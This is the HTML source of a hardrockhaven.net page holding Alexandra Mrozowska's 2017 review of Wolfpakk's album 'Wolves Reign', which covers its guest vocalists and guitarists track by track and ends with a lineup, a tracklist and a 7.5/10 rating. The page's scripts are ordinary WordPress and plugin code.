<!DOCTYPE html>
<html class="no-js mh-layout-1 mh-large mh-one-sb" lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#">
<head>
<meta charset="UTF-8">
<title>Wolfpakk | Wolves Reign Music Review - hardrockhaven.net</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Nobile|Roboto+Condensed:300,400,700">
<link rel="stylesheet" href="http://hardrockhaven.net/online/wp-content/themes/mh_magazine/style.css" media="screen">
<meta name="description" content="Michael Sweeney and Michael Voss continue their shared venture under the Wolfpakk moniker with the release of Wolves Reign ..." />
<meta name="keywords" content="Wolfpakk, Wolves Reign, Music Review, AFM Records, Hard Rock, Melodic Metal, Michael Voss, Biff Byford, Michael Vescera, Tony Harnell, Steve Grimmett, Brad Gillis, George Lynch, Chris Holmes, Rudy Sarzo" />
<link rel="shortcut icon" href="http://hardrockhaven.net/online/wp-content/uploads/2013/10/favicon.ico">
<!--[if lt IE 9]>
<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
<![endif]-->
<meta name="viewport" content="width=device-width; initial-scale=1.0">
<link rel="pingback" href="http://hardrockhaven.net/online/xmlrpc.php"/>
<!--[if IE 7]><link rel='stylesheet' id='css-ie-fix' href='http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/assets/css/css-ie7-fix.css' type='text/css' media='all' /> <![endif]--><link rel='dns-prefetch' href='//ajax.googleapis.com' />
<link rel='dns-prefetch' href='//code.jquery.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="hardrockhaven.net &raquo; Feed" href="http://hardrockhaven.net/online/feed/" />
<link rel="alternate" type="application/rss+xml" title="hardrockhaven.net &raquo; Comments Feed" href="http://hardrockhaven.net/online/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/hardrockhaven.net\/online\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.5"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='batch_css-css'  href='http://hardrockhaven.net/online/wp-content/plugins/batchmove/css/batch.css?ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='usr-style-css'  href='http://hardrockhaven.net/online/wp-content/plugins/universal-star-rating/includes/usr_style.php?px=16&#038;usrver=1.10.3&#038;ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='srp-front-stylesheet-css'  href='http://hardrockhaven.net/online/wp-content/plugins/special-recent-posts-pro/assets/css/css-front.css?ver=4.7.5' type='text/css' media='all' />
<link rel='stylesheet' id='bwg_frontend-css'  href='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/css/bwg_frontend.css?ver=1.3.36' type='text/css' media='all' />
<link rel='stylesheet' id='bwg_font-awesome-css'  href='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/css/font-awesome/font-awesome.css?ver=4.6.3' type='text/css' media='all' />
<link rel='stylesheet' id='bwg_mCustomScrollbar-css'  href='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/css/jquery.mCustomScrollbar.css?ver=1.3.36' type='text/css' media='all' />
<link rel='stylesheet' id='bwg_sumoselect-css'  href='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/css/sumoselect.css?ver=3.0.2' type='text/css' media='all' />
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/batchmove/js/batch.js?ver=4.7.5'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var impression_object = {"ajax_url":"http:\/\/hardrockhaven.net\/online\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var click_object = {"ajax_url":"http:\/\/hardrockhaven.net\/online\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/bwg_frontend.js?ver=1.3.36'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var bwg_objectsL10n = {"bwg_select_tag":"Select Tag","bwg_search":"Search"};
/* ]]> */
</script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/jquery.sumoselect.min.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/jquery.mobile.js?ver=1.3.36'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/jquery.mCustomScrollbar.concat.min.js?ver=1.3.36'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/jquery.fullscreen-0.4.1.js?ver=0.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var bwg_objectL10n = {"bwg_field_required":"field is required.","bwg_mail_validation":"This is not a valid email address.","bwg_search_result":"There are no images matching your search."};
/* ]]> */
</script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/plugins/photo-gallery/js/bwg_gallery_box.js?ver=1.3.36'></script>
<script type='text/javascript' src='http://code.jquery.com/jquery-migrate-1.2.1.js?ver=4.7.5'></script>
<script type='text/javascript' src='http://hardrockhaven.net/online/wp-content/themes/mh_magazine/js/scripts.js?ver=4.7.5'></script>
<link rel='https://api.w.org/' href='http://hardrockhaven.net/online/wp-json/' />
<link rel='prev' title='Alice Cooper' href='http://hardrockhaven.net/online/2017/05/alice-cooper-concert-photo-gallery-2017/' />
<link rel="canonical" href="http://hardrockhaven.net/online/2017/05/wolfpakk-wolves-reign-music-review/" />
<link rel='shortlink' href='http://hardrockhaven.net/online/?p=54647' />
<link rel="alternate" type="application/json+oembed" href="http://hardrockhaven.net/online/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fhardrockhaven.net%2Fonline%2F2017%2F05%2Fwolfpakk-wolves-reign-music-review%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://hardrockhaven.net/online/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fhardrockhaven.net%2Fonline%2F2017%2F05%2Fwolfpakk-wolves-reign-music-review%2F&#038;format=xml" />

<!-- This site is using AdRotate v4.1 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-1 { margin:1px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->

<!-- Graceful Pull-Quotes plugin v2.6.1 -->
	<link rel="stylesheet" href="http://hardrockhaven.net/online/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes-core.css" type="text/css" />
	<link rel="stylesheet" href="http://hardrockhaven.net/online/wp-content/plugins/graceful-pull-quotes/styles/Default.css" type="text/css" />
	<script type="text/javascript">
		var jspq_options = new Array("1", "1", "right", "1", "1", "aside", "pullquote", "pullquote pqRight");
	</script>
	<script type="text/javascript" src="http://hardrockhaven.net/online/wp-content/plugins/graceful-pull-quotes/resources/jspullquotes.js"></script>
<!-- end pull-quote additions -->
<meta name="generator" content="NextGEN Gallery v2.2.3" />
<meta name="generator" content="NextGEN Gallery Optimizer Basic v2.1.5" />
   
    <style type="text/css">
    	    				h1, h2, h3, h4, h5, h6 { font-family: "Roboto Condensed", sans-serif; }
							body { font-family: "Nobile", sans-serif; }	
		    		
    		.header-wrap { background: #000000 }
    	    		
    		.wrapper { background: #111111 }
    	    	    		    		.main-nav, 
    		.header-nav .menu .menu-item:hover > .sub-menu,
    		.main-nav .menu .menu-item:hover > .sub-menu, 
    		.footer-nav .menu-item:hover,
    		.slide-caption,
    		.spotlight,
    		#carousel,
    		footer,
    		#commentform input#submit:hover,
    		#cancel-comment-reply-link:hover,
    		.wpcf7-submit:hover { background: #000000 }
    	    	    		    		.logo-desc,
    		.ticker-title,
    		.header-nav .menu-item:hover,
    		.main-nav li:hover,
    		.footer-nav,
    		.footer-nav .menu .menu-item:hover > .sub-menu,
    		.sl-caption,
    		.subheading,
    		.page-title,
    		.caption,
    		.page-numbers:hover,
    		.current,
    		.pagelink,
    		a:hover .pagelink,
    		#commentform input#submit,
    		#cancel-comment-reply-link,
    		.wpcf7-submit,
    		.post-tags li:hover,
    		.tagcloud a:hover { background: #a31000; }
    		.slide-caption,
    		#carousel,
    		.widget-title,
    		.footer-widget-title,
    		.author-box,
    		.cat-desc,
    		#author:hover,
    		#email:hover,
    		#url:hover,
    		#comment:hover,
    		blockquote { border-color: #a31000; }
    		a:hover,
    		.entry a:hover,
    		.slide-title:hover, 
    		.sl-title:hover,
    		.related-title:hover,
    		.dropcap { color: #a31000; }
    	    		
    		.news-ticker,
    		#searchform,
    		.author-box,
    		.cat-desc,
    		.post-nav-wrap,
    		#wp-calendar caption,
    		.no-comments,
    		#respond,
    		.wpcf7-form { background: #494949; }
    	    		
    		body { color: #e5a320; }
    	    	    		.logo-desc,
    		.header-nav .menu-item:hover a, 
    		.header-nav .sub-menu a,
    		.main-nav li a,
    		.footer-nav .menu-item:hover a, 
    		.footer-nav .sub-menu a,
    		.ticker-title,	
    		.subheading,
    		.page-title,
    		footer,
    		.sl-title,
    		.sl-caption,
    		.slide-caption,
    		.caption { color: #e5a320; }
    	    	    		.meta, .breadcrumb { color: #efca37; }
    	    	    		a, .entry a { color: #e59f14; }
    	    	.cat-desc { background: #111; }
.slide-title:hover { color: #e59f14; }

	</style> 
    <style type="text/css" id="custom-background-css">
body.custom-background { background-color: #000000; background-image: url("http://hardrockhaven.net/online/wp-content/uploads/2014/11/red-fire21.jpg"); background-position: center top; background-size: auto; background-repeat: no-repeat; background-attachment: fixed; }
</style>

<!-- START - Facebook Open Graph, Google+ and Twitter Card Tags 2.0.8.1 -->
 <!-- Facebook Open Graph -->
  <meta property="og:locale" content="en_US"/>
  <meta property="og:site_name" content="hardrockhaven.net"/>
  <meta property="og:title" content="Wolfpakk | Wolves Reign"/>
  <meta property="og:url" content="http://hardrockhaven.net/online/2017/05/wolfpakk-wolves-reign-music-review/"/>
  <meta property="og:type" content="article"/>
  <meta property="og:description" content="by Alexandra Mrozowska
- Senior Columnist --

As opposed to the so-called super groups – burdened with instability from the moment of birth – the all-star project with its clear division into masterminds and guest performers gives the former almost endless possibilities to push forward. Even so,"/>
  <meta property="og:image" content="http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500.jpg"/>
  <meta property="article:published_time" content="2017-05-24T07:25:52+00:00"/>
  <meta property="article:modified_time" content="2017-05-24T07:25:52+00:00" />
  <meta property="og:updated_time" content="2017-05-24T07:25:52+00:00" />
  <meta property="article:section" content="Music Reviews"/>
  <meta property="article:publisher" content="https://www.facebook.com/HardrockHaven.net/"/>
  <meta property="fb:app_id" content="164933486909694"/>
 <!-- Google+ / Schema.org -->
  <meta itemprop="name" content="Wolfpakk | Wolves Reign"/>
  <meta itemprop="description" content="by Alexandra Mrozowska
- Senior Columnist --

As opposed to the so-called super groups – burdened with instability from the moment of birth – the all-star project with its clear division into masterminds and guest performers gives the former almost endless possibilities to push forward. Even so,"/>
  <meta itemprop="image" content="http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500.jpg"/>
 <!-- Twitter Cards -->
  <meta name="twitter:title" content="Wolfpakk | Wolves Reign"/>
  <meta name="twitter:url" content="http://hardrockhaven.net/online/2017/05/wolfpakk-wolves-reign-music-review/"/>
  <meta name="twitter:description" content="by Alexandra Mrozowska
- Senior Columnist --

As opposed to the so-called super groups – burdened with instability from the moment of birth – the all-star project with its clear division into masterminds and guest performers gives the former almost endless possibilities to push forward. Even so,"/>
  <meta name="twitter:image" content="http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500.jpg"/>
  <meta name="twitter:card" content="summary_large_image"/>
 <!-- SEO -->
 <!-- Misc. tags -->
<!-- END - Facebook Open Graph, Google+ and Twitter Card Tags 2.0.8.1 -->

</head>
<body id="mh-mobile" class="post-template-default single single-post postid-54647 single-format-standard custom-background"> 
<aside class="header-widget">
	<div class="sb-widget">			<div class="textwidget"><!-- Error, Ad is not available at this time due to schedule/geolocation restrictions! --></div>
		</div></aside>
<div class="container mh-mobile">
<header class="header-wrap">
		<div class="logo-wrap" role="banner">
<a href="http://hardrockhaven.net/online/" title="hardrockhaven.net" rel="home"><img src="http://hardrockhaven.net/online/wp-content/uploads/2014/11/HardrockHaven2014tolex.jpg" height="152" width="959" alt="hardrockhaven.net" /></a>
</div>
	<nav class="main-nav clearfix">
		<div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-32463" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-32463"><a href="http://hardrockhaven.net/online/">Home</a></li>
<li id="menu-item-32459" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32459"><a href="http://hardrockhaven.net/online/featured-articles/">Articles</a></li>
<li id="menu-item-32460" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32460"><a href="http://hardrockhaven.net/online/concert-reviews/">Concert Reviews</a></li>
<li id="menu-item-48133" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48133"><a href="http://hardrockhaven.net/online/category/gear-reviews/">Gear</a></li>
<li id="menu-item-32461" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32461"><a href="http://hardrockhaven.net/online/interviews/">Interviews</a></li>
<li id="menu-item-32462" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-32462"><a href="http://hardrockhaven.net/online/music-reviews/">Music Reviews</a>
<ul class="sub-menu">
	<li id="menu-item-48539" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48539"><a href="http://hardrockhaven.net/online/category/music-reviews/1980-landmark-albums-turn-35/">1980: Landmark Albums Turn 35</a></li>
	<li id="menu-item-53838" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53838"><a href="http://hardrockhaven.net/online/category/music-reviews/reviews-revisisted/">Revisited</a></li>
</ul>
</li>
<li id="menu-item-32507" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32507"><a href="http://hardrockhaven.net/online/category/news-wires/">The PR Wires</a></li>
<li id="menu-item-41874" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41874"><a href="http://hardrockhaven.net/online/the-lists/">The Lists</a></li>
</ul></div>	</nav>
</header>
<section class="news-ticker clearfix">
	<div class="ticker-title">Hot off the Press</div>
	<div class="ticker-content">
		<ul id="ticker">
		    		<li><a href="http://hardrockhaven.net/online/2017/02/in-concert-glenn-hughes-concert-photo-gallery/"><span class="meta">February 8, 2017 in Concert Reviews // </span>In Concert: Glenn Hughes</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/wolfpakk-wolves-reign-music-review/"><span class="meta">May 24, 2017 in Music Reviews // </span>Wolfpakk | Wolves Reign</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/alice-cooper-concert-photo-gallery-2017/"><span class="meta">May 22, 2017 in Concert Reviews // </span>Alice Cooper</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/mark-schuster-music-review/"><span class="meta">May 22, 2017 in Music Reviews // </span>Mark Schuster | Mark Schuster</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/carolina-rebellion-concert-photo-gallery-2017/"><span class="meta">May 17, 2017 in Concert Reviews // </span>Carolina Rebellion 2017</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/video-interview-with-wrathchild-of-sacred-leather/"><span class="meta">May 17, 2017 in Featured // </span>Wrathchild of Sacred Leather</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/styx-is-ready-for-takeoff-with-their-first-studio-album-in-14-years-the-mission/"><span class="meta">May 9, 2017 in The PR Wires // </span>STYX Is Ready For Takeoff With Their First Studio Album In 14 Years, ‘The Mission&#8217;</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/live-styx-concert-photo-gallery-2017/"><span class="meta">May 8, 2017 in Concert Reviews // </span>LIVE! | STYX</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/the-american-nightmare-tour-concert-review/"><span class="meta">May 8, 2017 in Concert Reviews // </span>The American Nightmare Tour: Beartooth, Underoath &#038; Bring Me The Horizon</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/live-frank-carter-and-the-rattlesnakes-concert-review/"><span class="meta">May 8, 2017 in Concert Reviews // </span>LIVE! | Frank Carter and The Rattlesnakes</a></li>
    	    		<li><a href="http://hardrockhaven.net/online/2017/05/lillian-axe-reissue-two-classic-albums-via-rock-candy-records/"><span class="meta">May 1, 2017 in The PR Wires // </span>Lillian Axe Reissue Two Classic Albums Via Rock Candy Records</a></li>
    		    </ul>
	</div>
</section>
<div class="wrapper clearfix">
	<div class="main">
				<div class="content left"><article class="post-54647 post type-post status-publish format-standard has-post-thumbnail hentry category-music-reviews tag-afm-records tag-biff-byford tag-brad-gillis tag-chris-holmes tag-george-lynch tag-hard-rock tag-melodic-metal tag-michael-vescera tag-michael-voss tag-music-review tag-rudy-sarzo tag-steve-grimmett tag-tony-harnell tag-wolfpakk tag-wolves-reign">
	<header class="post-header">			
		<h1 class="entry-title">Wolfpakk | Wolves Reign</h1>
					
	</header>
		<div class="entry clearfix"><blockquote><p><span style="text-decoration: underline;">by Alexandra Mrozowska</span><br />
&#8211; Senior Columnist &#8212;</p></blockquote>
<p><img src="http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500-350x350.jpg" alt="" width="350" height="350" class="alignright size-medium wp-image-54650" srcset="http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500-350x350.jpg 350w, http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500-100x100.jpg 100w, http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500-500x500.jpg 500w, http://hardrockhaven.net/online/wp-content/uploads/2017/05/WP_ROW-C_1500x1500.jpg 600w" sizes="(max-width: 350px) 100vw, 350px" />As opposed to the so-called super groups – burdened with instability from the moment of birth – the all-star project with its clear division into masterminds and guest performers gives the former almost endless possibilities to push forward. Even so, there must be a proverbial thorn in their side as well, this being the concern of repetitiveness as well as a difficult compromise between the cohesion of the project and variety of artists gathered for recordings. Especially the latter must have been a priority for Michael Sweeney (ex-Crystal Ball) and Michael Voss (Mad Max, Michael Schenker, ex-Casanova) and the continuation of their shared venture under a Wolfpakk moniker. What they did for their fourth album Wolves Reign was to combine guest singers from both sides of the musical spectrum, from Saxon’s Biff Byford to Tyketto’s Danny Vaughn. And guessing from the final result, the compromise was reached successfully.<br />
With its soaring melody and blistering guitars, the opening track “Falling” gives a listener more or less accurate impression of what’s the overall vibe of the entire album. The song’s first verse reveals Claus Lessmann (Phantom V, ex-Bonfire) being featured here on vocals alongside Sweeney and Voss, the former’s voice immediately recognizable for every Melodic Hard Rock fan. The tight rhythm section is comprised in half by another big name of the same genre – the former bass player in Dio, Ozzy Osbourne’s band and Quiet Riot, Rudy Sarzo. In “Run All Night”, it’s Mike Vescera (ex-Malmsteen) who takes over the microphone, the song itself being a fine piece of fast-paced Melodic Metal. “Blood Brothers” blends the thunderous Heavy Metal sound with tribal chants as the legendary Biff Byford of Saxon teams up with Sweeney and Voss to tell the tragic, yet true tale of Sitting Bull and the Sioux tribe. </p>
<p>Although the ‘80s-tinted, synth-laden intro might have suggested otherwise at first, the album’s ballad-ish title track has a dark and somewhat ominous vibe to it. It’s marked by the guest appearance of Tony Harnell (known from his tenures in TNT as well as a short stint in Skid Row) on vocals, whereas the wailing guitar solo has been provided by the former axeman of Dokken, George Lynch. “No Remorse” comes next with its anthemic, guitar-laden sound and furious pace on the verge of Power Metal, a rapid change of mood in comparison with its predecessor. Behind the microphone, there’s Avantasia’s Oliver Hartmann sharing his vocal duties with Sweeney and Voss, his voice shining throughout the song. The current singer of Victory, Jioti Parcharidis, takes the helm in “Inside The Animal Mind”, revealing yet another side to otherwise glossy and melodic sound of Wolfpakk as scorching through the rough and rampant track. On the other hand, “Scream Of The Hawk” and “The 10 Commandments” both mark a return to the anthemic formula and soaring melodies. The former features Steve Grimmett (Grim Reaper) on vocals, whereas the latter – Pasi Rantanen of Thunderstone.</p>
<p>The topic of environmental issues and the damage to the Earth seems to be utilized in Melodic Hard Rock quite eagerly these days. Wolfpakk also follows this path in “Mother Earth”, an intense, emotionally laden piece number nine with guest participations of Pretty Maids’ Ronnie Atkins and Simone Christinat of Legenda Aurea. The slow-ish outro of the track closes it on a contemplative note, corresponding well with what comes next. Featuring Tyketto’s Danny Vaughn alongside Sweeney and Voss, “Tomorrowland” is a piece of charming, piano-based balladry. And also, a heavy contrast to the very last song on Wolves Reign, as “I’m Onto You” with Lickford’s Andy Lickford on vocals and ex-W.A.S.P.’s Chris Holmes on guitars provides a rough and heavy final chapter to the album instead. </p>
<p>Thirty years ago, a ‘80s Hard Rock and Metal fan could only wonder what would it sound like to have the likes of Claus Lessmann, Biff Byford, Steve Grimmett, George Lynch and Rudy Sarzo on one album. Meticulously crafted under the careful guidance of Michael Voss and Michael Sweeney, Wolfpakk’s Wolves Reign gives the answer for those who could have wondered then. And although every musical or vocal addition to the eponymous ‘pack of ‘wolves’ carries a bit of their own vibe to it, overall the album is cohesive and coherent, a tight set of eleven Hard Rock pieces blending the past glory of the genre with the modern-day production. Recommended. </p>
<p>Genre: Hard Rock, Melodic Metal</p>
<p>Band:<br />
Michael Sweeney: vocals<br />
Michael Voss: vocals, guitars (tracks 2, 6, 8, 10), bass (track 3, 5, 6, 8, 9, 10, 11)</p>
<p>Guest appearances:<br />
Vocals: Biff Byford (Saxon), Ronnie Atkins (Pretty Maids), Michael Vescera (ex- Yngwie Malmsteen), Tony Harnell (TNT), Oliver Hartmann (Avantasia), Jioti Parcharidis (Victory), Steve Grimmett (Grim Reaper), Pasi Rantanen (Thunderstone), Claus Lessmann (Phantom V), Danny Vaughn (Tyketto), Andy Lickford (Lickford)<br />
Guitars: Timo Somers (Delain), Brad Gillis (Night Ranger), George Lynch (ex-Dokken), Alen Brentini (A. Gabalier), Jen Majura (Evanescence), Chris Holmes (ex-W.A.S.P.)<br />
Bass: Rudy Sarzo (Ozzy Osbourne), Marc Lynn (Gotthard), Volker Krawczak (Axel Rudi Pell), Michael Müller (Herman Frank)<br />
Drums: Alex Holzwarth (Avantasia), Gereon Homan</p>
<p>Tracklist:<br />
1. Falling<br />
2. Run All Night<br />
3. Blood Brothers<br />
4. Wolves Reign<br />
5. No Remorse<br />
6. Inside The Animal Mind<br />
7. Spirit Of The Hawk<br />
8. The 10 Commandments<br />
9. Mother Earth<br />
10. Tomorrowland<br />
11. I’m Onto You</p>
<p>Label: AFM Records</p>
<p>Website: <a href="http://www.wolfpakk.net/" target="_blank">http://www.wolfpakk.net/</a></p>
<p>Hardrock Haven rating: <img class="usr" src="http://hardrockhaven.net/online/wp-content/plugins/universal-star-rating/includes/stars.php?img=06.png&amp;px=20&amp;max=10&amp;rat=7.5" style="height: 20px !important;" alt="7.5 Stars" /> (7.5 / 10)</p>
	</div>
	           
			<div class="post-tags clearfix">
        	<ul><li><a href="http://hardrockhaven.net/online/tag/afm-records/" rel="tag">AFM Records</a></li><li><a href="http://hardrockhaven.net/online/tag/biff-byford/" rel="tag">Biff Byford</a></li><li><a href="http://hardrockhaven.net/online/tag/brad-gillis/" rel="tag">BRAD GILLIS</a></li><li><a href="http://hardrockhaven.net/online/tag/chris-holmes/" rel="tag">Chris Holmes</a></li><li><a href="http://hardrockhaven.net/online/tag/george-lynch/" rel="tag">George Lynch</a></li><li><a href="http://hardrockhaven.net/online/tag/hard-rock/" rel="tag">hard rock</a></li><li><a href="http://hardrockhaven.net/online/tag/melodic-metal/" rel="tag">Melodic Metal</a></li><li><a href="http://hardrockhaven.net/online/tag/michael-vescera/" rel="tag">Michael Vescera</a></li><li><a href="http://hardrockhaven.net/online/tag/michael-voss/" rel="tag">Michael Voss</a></li><li><a href="http://hardrockhaven.net/online/tag/music-review/" rel="tag">Music Review</a></li><li><a href="http://hardrockhaven.net/online/tag/rudy-sarzo/" rel="tag">Rudy Sarzo</a></li><li><a href="http://hardrockhaven.net/online/tag/steve-grimmett/" rel="tag">Steve Grimmett</a></li><li><a href="http://hardrockhaven.net/online/tag/tony-harnell/" rel="tag">Tony Harnell</a></li><li><a href="http://hardrockhaven.net/online/tag/wolfpakk/" rel="tag">Wolfpakk</a></li><li><a href="http://hardrockhaven.net/online/tag/wolves-reign/" rel="tag">Wolves Reign</a></li></ul>        </div>
		<div class="sb-widget posts-2">			<div class="textwidget"><img src="http://hardrockhaven.net/online/wp-content/uploads/2013/02/advertisement.png" alt="advertisement" width="75" height="7" class="alignleft size-full wp-image-26074" />

<br />

<center>
<div class="a-single a-84"><a href="http://chrisbickley.com/" target="blank"><img src="http://hardrockhaven.net/online/wp-content/uploads/2012/01/ChrisBickley2017.jpg" alt="" width="500" height="90" class="alignnone size-full wp-image-53960" /></a></div>
</center>
</div>
		</div>	
</article>
			<section class="share-buttons-container clearfix">
	    	<div class="share-button"><div class="fb-like" data-send="false" data-layout="button_count" data-width="450" data-show-faces="true" data-font="verdana"></div></div>
			<div class="share-button"><a href="https://twitter.com/share" class="twitter-share-button">Tweet</a></div>
			<div class="share-button"><div class="g-plusone" data-size="medium"></div></div>           	
		</section><nav class="section-title clearfix" role="navigation">
<div class="post-nav left">
<a href="http://hardrockhaven.net/online/2017/05/alice-cooper-concert-photo-gallery-2017/" rel="prev">&larr; Previous post</a></div>
<div class="post-nav right">
</div>
</nav>
<section class="related-posts">
<h3 class="section-title">Related Posts</h3>
<ul>
<li class="related-wrap clearfix">
<div class="related-thumb">
<a href="http://hardrockhaven.net/online/2016/08/michael-sweet-one-sided-war-cd-review/" title="Michael Sweet | One Sided War"><img width="70" height="53" src="http://hardrockhaven.net/online/wp-content/uploads/2016/08/Michael-Sweet-One-Sided-War-70x53.jpg" class="attachment-cp_small size-cp_small wp-post-image" alt="" srcset="http://hardrockhaven.net/online/wp-content/uploads/2016/08/Michael-Sweet-One-Sided-War-70x53.jpg 70w, http://hardrockhaven.net/online/wp-content/uploads/2016/08/Michael-Sweet-One-Sided-War-174x131.jpg 174w, http://hardrockhaven.net/online/wp-content/uploads/2016/08/Michael-Sweet-One-Sided-War-300x225.jpg 300w" sizes="(max-width: 70px) 100vw, 70px" /></a>
</div>
<div class="related-data">
<a href="http://hardrockhaven.net/online/2016/08/michael-sweet-one-sided-war-cd-review/"><h4 class="related-title">Michael Sweet | One Sided War</h4></a>
<span class="related-subheading"></span>
</div>
</li>
<li class="related-wrap clearfix">
<div class="related-thumb">
